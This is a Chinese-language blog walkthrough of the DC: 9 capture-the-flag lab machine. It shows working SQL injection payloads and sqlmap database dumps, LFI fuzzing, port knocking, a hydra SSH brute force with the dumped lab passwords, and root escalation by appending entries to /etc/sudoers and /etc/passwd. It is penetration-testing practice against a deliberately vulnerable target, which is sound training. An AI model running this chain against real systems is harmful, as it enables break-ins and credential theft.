DC 系列第九題, DC: 9 終於在年假結束的第二個禮拜全數解題完畢,雖然比預期晚了兩個禮拜,但…至少還是有兌現當時後開的支票,之後若有空應該還是會持續找靶機來練習,若自信允許的話,應該會也會抽空嘗試 OSCP 吧。
環境設定
VirtualBox: Kali & DC: 9
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:09 CST
Nmap scan report for 10.0.2.1
Host is up (0.013s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00025s latency).
Nmap scan report for 10.0.2.20
Host is up (0.0021s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 13.71 seconds
$ nmap 10.0.2.20 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:51 CST
Nmap scan report for 10.0.2.20
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds
解題過程
由於只有開 80 Port,就連上去看看,並且發現是一個簡單的網站。
Wappalyzer
透過 Wappalyzer 並沒有什麼發現。
SQL Injection
透過 Search 功能找到 SQL Injection 的注入點。
SQLMAP
發現資料庫 users 的 UserDetails 資料表中,含有許多帳號密碼,並且密碼並未加密。
$ sqlmap -r dc9_payload.txt --dbs -D users -T UserDetails --dump
___
__H__
___ ___[)]_____ ___ ___ {1.4.11#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:57:24 /2021-02-20/
[10:57:24] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[10:57:25] [INFO] resuming back-end DBMS 'mysql'
[10:57:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[10:57:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:57:25] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[10:57:26] [INFO] fetching columns for table 'UserDetails' in database 'users'
[10:57:26] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
接著再找 Staff 資料庫的 Users 資料表,發現一組 admin 的帳號與密碼 Hash。
$ sqlmap -r dc9_payload.txt --dbs -D Staff -T Users --dump
___
__H__
___ ___[.]_____ ___ ___ {1.4.11#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:33:40 /2021-02-21/
[13:33:40] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[13:33:42] [INFO] resuming back-end DBMS 'mysql'
[13:33:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[13:33:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[13:33:42] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[13:33:42] [INFO] fetching columns for table 'Users' in database 'Staff'
[13:33:42] [INFO] fetching entries for table 'Users' in database 'Staff'
[13:33:42] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[13:33:43] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[13:33:44] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[13:33:45] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:33:45] [INFO] starting 2 processes
[13:34:47] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
[13:34:47] [INFO] table 'Staff.Users' dumped to CSV file '/home/mksyi/.local/share/sqlmap/output/10.0.2.20/dump/Staff/Users.csv'
[13:34:47] [INFO] fetched data logged to text files under '/home/mksyi/.local/share/sqlmap/output/10.0.2.20'
Login
首先嘗試使用 users 資料庫裡面的使用者帳密進行登入,試了幾組後都無法成功,轉為使用 Staff 資料表,但密碼經過 HASH,透過線上工具 crackstation 解出密碼為 transorbital1。
嘗試用 admin/transorbital1 登入成功後,發現底部有個 File does not exist 字樣,這個有點像是 DC: 5 的 footer 一樣是參數 file 的位置可被 LFI。
但可以 LFI,卻沒有地方可以寫入檔案,必且也沒有 phpinfo 可以利用,不知道該如何 RCE,最後用 Burp 爆一下目錄。
wfuzz -c -z file,linux_list.txt --hw 78 -u http://10.0.2.20/welcome.php?file=../../../../../../..FUZZ -b PHPSESSID=9grc9ljpq4n37bvr0n012p37in
但還是沒有得到可以利用的資訊,這邊折騰了幾天,最後決定看偷看一下別人的 Write-up,其他人發現了 /etc/knockd.conf 的檔案,到這邊才初步認識到 Single Packet Authorization (SPA) 這個概念。
先用防火牆預設把所有的 ports (或至少重要的 ports, 例如 22) 通通封掉, 這就像是在門鎖之外再蓋上一層 沒有鎖頭、 沒有鑰匙孔的門 一樣。 然後跟客戶端約好按照某個特定順序敲幾個 ports (例如先敲 23815、 次敲 62408、 再敲 59174) 伺服器偵測到這個特定順序, 外門才會像芝麻開門一樣地短暫打開一兩分鐘, 這時才看得見鑰匙孔 (port 22, ssh)。
連鑰匙孔都藏起來的 ssh 完全防禦: SPA
檢視 /etc/knockd.conf 設定檔內容後可以看到,ssh 的開啟條件為 7469、8475、9842。
但這邊還有一個問題,就算可以登入,也沒有帳號密碼,於是想到前面從資料庫偷到的明文帳號密碼組來嘗試。
marym/3kfs86sfd
julied/468sfdfsd2
fredf/4sfd87sfd1
barneyr/RocksOff
tomc/TC&TheBoyz
jerrym/B8m#48sd
wilmaf/Pebbles
bettyr/BamBam01
chandlerb/UrAG0D!
joeyt/Passw0rd
rachelg/yN72#dsd
rossg/ILoveRachel
monicag/3248dsds7s
phoebeb/smellycats
scoots/YR3BVxxxw87
janitor/Ilovepeepee
janitor2/Hawaii-Five-0
分別存成 dc9_user.txt 與 dc9_pass.txt 後,使用 hydra 進行爆破,然後記得先按規則敲一下目標。
$ for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 10.0.2.20; done
$ hydra -L dc9_user.txt -P dc9_pass.txt ssh://10.0.2.20
爆破獲取得三組帳號密碼。
[22][ssh] host: 10.0.2.20 login: chandlerb password: UrAG0D!
[22][ssh] host: 10.0.2.20 login: joeyt password: Passw0rd
[22][ssh] host: 10.0.2.20 login: janitor password: Ilovepeepee
Get Root to Win
現在可以透過 SSH 進行登入了,簡單探勘,三組用戶都沒有被加入 sudoers 裡,同時也沒有 gcc,但發現使用者 janitor 的路徑底下有 passwords-found-on-post-it-notes.txt 檔。
$ ssh janitor@10.0.2.20
$ cat /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt
把他加入到密碼表之後,在爆一次,多爆出了一組用戶。
[22][ssh] host: 10.0.2.20 login: fredf password: B4-Tru3-001
嘗試登入 fredf,並嘗試獲得更多資訊。
ssh fredf@10.0.2.20
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
發現可以使用 test 這隻程式。
fredf@dc-9:/opt/devstuff/dist/test$ ./opt/devstuff/dist/test/test
Usage: python test.py read append
根據 Usage 的意思看來,可能是讀取 read 的檔案內容,並 append 在 append 檔案的末端,隨後經實驗證實也是如此。
藉此可以用來新增使用者或改寫檔案,例如新增 sudoers,或直接透過 /etc/passwd 新增一個等 root 使用者。
修改 sudoers:
echo -en "fredf ALL=(ALL:ALL) ALL" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/sudoers
新增使用者:
$ openssl passwd -1 -salt hacker 123456
$1$hacker$6luIRwdGpBvXdP.GMwcZp/
echo -en "mksyi:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/passwd
Get Root
sudo su
[sudo] password for fredf:
root@dc-9:/tmp#
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.